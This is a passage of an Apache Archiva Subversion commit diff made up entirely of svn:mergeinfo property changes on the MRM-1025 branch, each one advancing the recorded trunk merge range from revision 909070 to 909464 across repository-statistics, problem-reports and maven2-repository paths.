-/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache:825850-882383,882384-909070* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache:825850-882383,882384-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva:825850-882383,882384-909070* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva:825850-882383,882384-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/dependency/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/dependency:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/dependency:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/dependency:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/dependency:825850-882383,885006-909070* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/dependency:825850-882383,885006-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/dependency/tree/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/dependency/tree:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/dependency/tree:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/dependency/tree:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/dependency/tree:825850-882383,885006-909070* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/dependency/tree:825850-882383,885006-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/dependency/tree/maven2/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/dependency/tree/maven2:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/dependency/tree/maven2:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/dependency/tree/maven2:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/dependency/tree/maven2:825850-882383,885006-909070* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/dependency/tree/maven2:825850-882383,885006-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/dependency/tree/maven2/DependencyTreeBuilderTest.xml ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/dependency/tree/maven2/DependencyTreeBuilderTest.xml:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/dependency/tree/maven2/DependencyTreeBuilderTest.xml:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/dependency/tree/maven2/DependencyTreeBuilderTest.xml:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/dependency/tree/maven2/DependencyTreeBuilderTest.xml:825850-882383,885006-909070 +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/dependency/tree/maven2/DependencyTreeBuilderTest.xml:825850-882383,885006-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/metadata/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/metadata:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/metadata:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/metadata:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/metadata:825850-882383,882384-909070* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/metadata:825850-882383,882384-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/metadata/repository/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/metadata/repository:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/metadata/repository:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/metadata/repository:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/metadata/repository:825850-882383,882384-909070* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/metadata/repository:825850-882383,882384-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/metadata/repository/storage/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/metadata/repository/storage:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/metadata/repository/storage:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/metadata/repository/storage:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/metadata/repository/storage:825850-882383,882384-909070* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/metadata/repository/storage:825850-882383,882384-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/metadata/repository/storage/maven2/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/metadata/repository/storage/maven2:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/metadata/repository/storage/maven2:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/metadata/repository/storage/maven2:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/metadata/repository/storage/maven2:825850-882383,882384-909070* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/metadata/repository/storage/maven2:825850-882383,882384-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/metadata/repository/storage/maven2/Maven2RepositoryMetadataResolverTest.xml ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/metadata/repository/storage/maven2/Maven2RepositoryMetadataResolverTest.xml:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/metadata/repository/storage/maven2/Maven2RepositoryMetadataResolverTest.xml:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/metadata/repository/storage/maven2/Maven2RepositoryMetadataResolverTest.xml:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/metadata/repository/storage/maven2/Maven2RepositoryMetadataResolverTest.xml:825850-909070 +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/metadata/repository/storage/maven2/Maven2RepositoryMetadataResolverTest.xml:825850-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports:699795-705848 -/archiva/trunk/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports:825850-889227,889228-909070* +/archiva/trunk/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports:825850-889227,889228-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/RepositoryProblemEventListener.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/RepositoryProblemEventListener.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/RepositoryProblemEventListener.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/RepositoryProblemEventListener.java:699795-705848 -/archiva/trunk/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/RepositoryProblemEventListener.java:825850-909070 +/archiva/trunk/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/RepositoryProblemEventListener.java:825850-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/RepositoryProblemFacet.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/RepositoryProblemFacet.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/RepositoryProblemFacet.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/RepositoryProblemFacet.java:699795-705848 -/archiva/trunk/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/RepositoryProblemFacet.java:825850-909070 +/archiva/trunk/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/RepositoryProblemFacet.java:825850-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/RepositoryProblemFacetFactory.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/RepositoryProblemFacetFactory.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/RepositoryProblemFacetFactory.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/RepositoryProblemFacetFactory.java:699795-705848 -/archiva/trunk/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/RepositoryProblemFacetFactory.java:825850-909070 +/archiva/trunk/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/RepositoryProblemFacetFactory.java:825850-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/consumers/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/consumers:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/consumers:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/consumers:699795-705848 -/archiva/trunk/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/consumers:825850-889227,889228-909070* +/archiva/trunk/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/consumers:825850-889227,889228-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/consumers/DuplicateArtifactsConsumer.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/consumers/DuplicateArtifactsConsumer.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/consumers/DuplicateArtifactsConsumer.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/consumers/DuplicateArtifactsConsumer.java:699795-705848 -/archiva/trunk/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/consumers/DuplicateArtifactsConsumer.java:825850-909070 +/archiva/trunk/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/consumers/DuplicateArtifactsConsumer.java:825850-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/repository-statistics:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/repository-statistics:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/repository-statistics:699795-705848 -/archiva/trunk/archiva-modules/plugins/repository-statistics:825850-887039,887040-909070* +/archiva/trunk/archiva-modules/plugins/repository-statistics:825850-887039,887040-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/pom.xml ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/repository-statistics/pom.xml:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/repository-statistics/pom.xml:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/repository-statistics/pom.xml:699795-705848 -/archiva/trunk/archiva-modules/plugins/repository-statistics/pom.xml:825850-909070 +/archiva/trunk/archiva-modules/plugins/repository-statistics/pom.xml:825850-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/repository-statistics/src:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/repository-statistics/src:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/repository-statistics/src:699795-705848 -/archiva/trunk/archiva-modules/plugins/repository-statistics/src:825850-887039,887040-909070* +/archiva/trunk/archiva-modules/plugins/repository-statistics/src:825850-887039,887040-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/main/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/repository-statistics/src/main:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/repository-statistics/src/main:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/repository-statistics/src/main:699795-705848 -/archiva/trunk/archiva-modules/plugins/repository-statistics/src/main:825850-887039,887040-909070* +/archiva/trunk/archiva-modules/plugins/repository-statistics/src/main:825850-887039,887040-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/main/java/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/repository-statistics/src/main/java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/repository-statistics/src/main/java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/repository-statistics/src/main/java:699795-705848 -/archiva/trunk/archiva-modules/plugins/repository-statistics/src/main/java:825850-887039,887040-909070* +/archiva/trunk/archiva-modules/plugins/repository-statistics/src/main/java:825850-887039,887040-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/main/java/org/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/repository-statistics/src/main/java/org:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/repository-statistics/src/main/java/org:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/repository-statistics/src/main/java/org:699795-705848 -/archiva/trunk/archiva-modules/plugins/repository-statistics/src/main/java/org:825850-887039,887040-909070* +/archiva/trunk/archiva-modules/plugins/repository-statistics/src/main/java/org:825850-887039,887040-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/repository-statistics/src/main/java/org/apache:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/repository-statistics/src/main/java/org/apache:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/repository-statistics/src/main/java/org/apache:699795-705848 -/archiva/trunk/archiva-modules/plugins/repository-statistics/src/main/java/org/apache:825850-887039,887040-909070* +/archiva/trunk/archiva-modules/plugins/repository-statistics/src/main/java/org/apache:825850-887039,887040-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva:699795-705848 -/archiva/trunk/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva:825850-887039,887040-909070* +/archiva/trunk/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva:825850-887039,887040-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata:699795-705848 -/archiva/trunk/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata:825850-887039,887040-909070* +/archiva/trunk/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata:825850-887039,887040-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/model/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/model:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/model:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/model:699795-705848 -/archiva/trunk/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/model:825850-887039,887040-909070* +/archiva/trunk/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/model:825850-887039,887040-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/model/stats/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/model/stats:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/model/stats:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/model/stats:699795-705848 -/archiva/trunk/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/model/stats:825850-887039,887040-909070* +/archiva/trunk/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/model/stats:825850-887039,887040-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository:699795-705848 -/archiva/trunk/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository:825850-887039,887040-909070* +/archiva/trunk/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository:825850-887039,887040-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats:699795-705848 -/archiva/trunk/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats:825850-887039,887040-909070* +/archiva/trunk/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats:825850-887039,887040-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats/DefaultRepositoryStatisticsManager.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats/DefaultRepositoryStatisticsManager.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats/DefaultRepositoryStatisticsManager.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats/DefaultRepositoryStatisticsManager.java:699795-705848 -/archiva/trunk/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats/DefaultRepositoryStatisticsManager.java:825850-909070 +/archiva/trunk/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats/DefaultRepositoryStatisticsManager.java:825850-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats/RepositoryStatistics.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats/RepositoryStatistics.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats/RepositoryStatistics.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats/RepositoryStatistics.java:699795-705848 -/archiva/trunk/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats/RepositoryStatistics.java:825850-909070 +/archiva/trunk/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats/RepositoryStatistics.java:825850-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats/RepositoryStatisticsFactory.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats/RepositoryStatisticsFactory.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats/RepositoryStatisticsFactory.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats/RepositoryStatisticsFactory.java:699795-705848 -/archiva/trunk/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats/RepositoryStatisticsFactory.java:825850-909070 +/archiva/trunk/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats/RepositoryStatisticsFactory.java:825850-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats/RepositoryStatisticsManager.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats/RepositoryStatisticsManager.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats/RepositoryStatisticsManager.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats/RepositoryStatisticsManager.java:699795-705848 -/archiva/trunk/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats/RepositoryStatisticsManager.java:825850-909070 +/archiva/trunk/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats/RepositoryStatisticsManager.java:825850-909464 Propchange: 